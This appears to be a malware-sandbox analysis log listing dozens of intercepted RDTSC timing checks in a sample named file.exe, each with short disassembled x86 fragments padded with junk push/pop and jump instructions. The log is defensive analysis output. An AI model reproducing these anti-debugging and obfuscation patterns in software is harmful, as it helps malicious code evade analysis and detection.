Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBD0EC second address: CBD0F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBD0F2 second address: CBD0F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC72CC second address: CC72E0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F29FC518336h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push edx 0x0000000c je 00007F29FC51833Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC6B71 second address: CC6B75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5AB0A second address: C5AB0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCDCB8 second address: CCDCD7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F29FCD43466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007F29FCD4346Ch 0x00000010 popad 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 pushad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCDCD7 second address: CCDCDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCDCDD second address: CCDCFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F29FCD43477h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD2C09 second address: CD2C0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD2C0D second address: CD2C13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C64CF4 second address: C64CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C64CF8 second address: C64D02 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F29FCD43466h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C64D02 second address: C64D45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F29FC518349h 0x0000000c jne 00007F29FC51833Ch 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jc 00007F29FC518336h 0x0000001c jmp 00007F29FC51833Eh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C64D45 second address: C64D73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FCD4346Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F29FCD43475h 0x00000010 pushad 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD19C4 second address: CD19ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC518348h 0x00000009 jmp 00007F29FC51833Bh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD19ED second address: CD1A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F29FCD4346Eh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD1A00 second address: CD1A08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD233A second address: CD2340 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD2480 second address: CD249C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F29FC518341h 0x00000008 jg 00007F29FC518336h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD25E5 second address: CD25EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD2749 second address: CD2775 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518348h 0x00000007 jmp 00007F29FC518340h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD2775 second address: CD27B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FCD43478h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a ja 00007F29FCD43477h 0x00000010 jmp 00007F29FCD43471h 0x00000015 jnp 00007F29FCD4346Eh 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD28DE second address: CD2914 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518346h 0x00000007 jmp 00007F29FC518341h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD2A5F second address: CD2A6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD87F4 second address: CD87F9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD87F9 second address: CD882C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 jmp 00007F29FCD43478h 0x0000000d jnc 00007F29FCD43466h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 jo 00007F29FCD4348Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD882C second address: CD8830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD8C61 second address: CD8C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 push edi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD8C6D second address: CD8C77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD90AB second address: CD90B1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD90B1 second address: CD90BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD90BB second address: CD90CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FCD43470h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD90CF second address: CD90D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD90D5 second address: CD90E5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F29FCD43466h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDDE7A second address: CDDE7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDDFB4 second address: CDDFB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDE23D second address: CDE24B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F29FC518336h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDE24B second address: CDE266 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FCD4346Bh 0x00000009 jmp 00007F29FCD4346Bh 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDE266 second address: CDE26D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDE26D second address: CDE27C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 js 00007F29FCD4346Eh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDE402 second address: CDE42A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F29FC518336h 0x0000000f jmp 00007F29FC518349h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDE42A second address: CDE42E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDE6D4 second address: CDE6DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDEB94 second address: CDEB9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDEB9A second address: CDEBB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F29FC518338h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jg 00007F29FC518336h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDF038 second address: CDF042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDD919 second address: CDD91D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDD91D second address: CDD935 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FCD43474h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDD935 second address: CDD952 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F29FC518345h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA0832 second address: C89EA8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jo 00007F29FCD43478h 0x0000000f jmp 00007F29FCD43472h 0x00000014 nop 0x00000015 mov dword ptr [ebp+122D276Bh], eax 0x0000001b lea eax, dword ptr [ebp+124875CBh] 0x00000021 add dword ptr [ebp+122D1ABCh], edx 0x00000027 nop 0x00000028 jmp 00007F29FCD43479h 0x0000002d push eax 0x0000002e jmp 00007F29FCD4346Bh 0x00000033 nop 0x00000034 mov cl, 67h 0x00000036 call dword ptr [ebp+122D566Ch] 0x0000003c pushad 0x0000003d jo 00007F29FCD43477h 0x00000043 jmp 00007F29FCD4346Fh 0x00000048 push ecx 0x00000049 pop ecx 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA0D01 second address: CA0D08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA0D08 second address: CA0D1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b jnp 00007F29FCD43466h 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA0E20 second address: CA0E26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA0EEB second address: CA0EEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA0EEF second address: CA0EF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA1176 second address: CA117A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA12FA second address: CA135B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 ja 00007F29FC51834Ah 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007F29FC518338h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 mov dword ptr [ebp+122D1A29h], ebx 0x0000002f push 00000004h 0x00000031 mov edx, dword ptr [ebp+122D39F9h] 0x00000037 push eax 0x00000038 jc 00007F29FC518352h 0x0000003e push eax 0x0000003f push edx 0x00000040 jp 00007F29FC518336h 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA17E6 second address: CA17EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA17EC second address: CA17F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA17F0 second address: CA1822 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F29FCD4346Bh 0x0000000f pop edx 0x00000010 nop 0x00000011 or ecx, dword ptr [ebp+122D1A62h] 0x00000017 push 0000001Eh 0x00000019 pushad 0x0000001a and ebx, dword ptr [ebp+122D292Ah] 0x00000020 mov ebx, dword ptr [ebp+122D3789h] 0x00000026 popad 0x00000027 nop 0x00000028 push esi 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA19A8 second address: CA19C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F29FC51833Fh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA1B4C second address: CA1B50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA1B50 second address: CA1B5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA1B5C second address: CA1B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA1B60 second address: CA1B8A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F29FC51834Dh 0x00000013 jmp 00007F29FC518347h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA1B8A second address: CA1BB9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F29FCD4346Fh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push esi 0x0000000e jns 00007F29FCD43468h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jnl 00007F29FCD43466h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA1BB9 second address: CA1BD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518344h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE2FAD second address: CE2FB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE2FB3 second address: CE2FC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F29FC51833Eh 0x0000000b jne 00007F29FC518336h 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE32D0 second address: CE32D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE32D4 second address: CE32D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE344D second address: CE3453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE35B3 second address: CE35B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE35B7 second address: CE35BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE3728 second address: CE373C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F29FC51833Ah 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE385C second address: CE386C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FCD4346Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE386C second address: CE389A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F29FC518342h 0x0000000c jng 00007F29FC518336h 0x00000012 jnp 00007F29FC518336h 0x00000018 jo 00007F29FC51833Ah 0x0000001e pushad 0x0000001f popad 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 jc 00007F29FC51834Ch 0x00000029 push edi 0x0000002a pushad 0x0000002b popad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE389A second address: CE38A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jng 00007F29FCD4346Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE39C5 second address: CE39E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F29FC518341h 0x0000000d jmp 00007F29FC51833Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE39E8 second address: CE39F2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F29FCD43466h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE39F2 second address: CE39F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE39F8 second address: CE3A0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F29FCD43472h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEAE24 second address: CEAE2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F29FC518336h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEC561 second address: CEC56B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEC56B second address: CEC571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEC571 second address: CEC576 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEC576 second address: CEC591 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518340h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEC591 second address: CEC5A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F29FCD43466h 0x0000000d jns 00007F29FCD43466h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEC5A4 second address: CEC5A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEC5A8 second address: CEC5AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEC5AE second address: CEC5B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEC5B4 second address: CEC5B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEF73E second address: CEF77A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F29FC518347h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007F29FC51834Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEF14E second address: CEF155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEF155 second address: CEF15A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEF456 second address: CEF45C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
